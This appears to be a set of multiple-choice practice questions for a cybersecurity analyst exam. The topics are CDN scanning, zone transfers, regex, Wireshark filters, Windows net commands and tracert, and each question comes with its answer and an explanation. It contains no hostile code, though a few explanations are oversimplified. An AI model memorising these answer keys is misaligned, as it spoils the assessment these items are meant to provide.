During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true? You are scanning a CDN-hosted copy of the site The server assumes you are conducting a DDoS attack Nothing can be determined about this site with the information provided The scan will not produce any useful information
You are scanning a CDN-hosted copy of the site This result is due to the company using a distributed server model that hosts content on edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the edge server's cache or pulled from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains only static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.
Which of the following tools is considered a web application scanner? Qualys OpenVAS ZAP Nessus
ZAP OWASP Zed Attack Proxy (ZAP) is the world's most widely used web application scanner. It is free, open-source, and provided by the Open Web Application Security Project (OWASP). Nessus, Qualys, and OpenVAS are all classified as infrastructure vulnerability scanners.
Which type of threat will patches NOT effectively combat as a security control? Known vulnerabilities Malware with defined indicators of compromise Zero-day attacks Discovered software bugs
Zero-day attacks Zero-day attacks have no known fix, so patches will not correct them. A zero-day vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). If a discovered software bug or known vulnerability is found, a patch or mitigation is normally available. If a piece of malware has well-defined indicators of compromise, a patch or signature can be created to defend against it, as well.
Which of the following techniques would allow an attacker to get a full listing of your internal DNS information if your DNS server is not properly secured? FQDN resolution Split horizon Zone transfers DNS poisoning
Zone transfers A DNS zone transfer provides a full listing of DNS information. If your organization's internal DNS server is improperly secured, an attacker can gather this information by performing a zone transfer. Fully qualified domain name (FQDN) resolution is a normal function of DNS that converts a domain name like www.diontraining.com to its corresponding IP address. Split horizon is a method of preventing a routing loop in a network. DNS poisoning is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites.
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b
\b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b The correct option is \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b, which uses parentheses and "OR" operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square brackets indicates that any of the characters contained in the square brackets are matching criteria, so the bracketed options would match single characters rather than whole addresses. Using the + operator indicates an allowance for one or more instances of the preceding element. In all cases, the period must have an escape (\) sequence preceding it, as the period is a reserved operator internal to REGEX.
Which of the following Wireshark filters should be applied to a packet capture to detect applications that send passwords in cleartext to a REST API located at 10.1.2.3? http.request.method=="POST" ip.proto==tcp http.request.method=="POST" && ip.dst==10.1.2.3 ip.dst==10.1.2.3
http.request.method=="POST" && ip.dst==10.1.2.3 Filtering the available PCAP with just the HTTP POST methods would display any data sent when accessing a REST API, regardless of the destination IP. Filtering the available PCAP with just the desired IP address would show all traffic to that host (10.1.2.3). Combining both of these minimizes the data displayed to only show things posted to the API located at 10.1.2.3. The ip.proto==tcp filter would display all TCP traffic on the network, regardless of the port, IP address, or application protocol being used. It would simply produce too much information to analyze.
You have been given access to a Windows system located on an Active Directory domain as part of a white box penetration test. Which of the following commands would provide information about other systems on this network? net user net use net config net group
net use The net use command will list the network shares that the workstation is using. This will help to identify file servers and print servers on the network. The net group command can only be used on domain controllers. The net config command allows the server and workstation services to be controlled once they have already been identified. The net user command would show any user accounts on the local Windows workstation you are using.
Barrett needs to verify settings on a macOS computer to ensure that the configuration he expects is currently set on the system. What type of file is commonly used to store configuration settings for a macOS system? .profile files plists .config files The registry
plists Preference and configuration files in macOS use property lists (plists) to specify the attributes, or properties, of an app or process. An example is the preferences plist for the Finder in the Library/Preferences/ folder of a user's home folder. The file is named com.apple.finder.plist. The registry is used to store configuration settings on Windows systems. A profile (.profile) file is a UNIX user's start-up file, like the autoexec.bat file of DOS. A configuration (.config) file is a plain-text file used by various applications that contains parameters defining settings or preferences for building or running a program. This is commonly used on Windows systems.
Which of the following commands would NOT provide domain name information and details about a host? dig -x [ip address] sc [ip address] host [ip address] nslookup [ip address]
sc [ip address] Service control (sc) is a Windows command that allows you to create, start, stop, query, or delete a Windows service. The dig command will give you information on when a query was performed, the details that were sent, and what flags were sent. In most cases, host and nslookup will also provide similar information.
You are troubleshooting a network connectivity issue and need to determine the packet's flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems? ipconfig tracert netstat nbtstat
tracert The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source computer. The ICMP "Time Exceeded" messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.
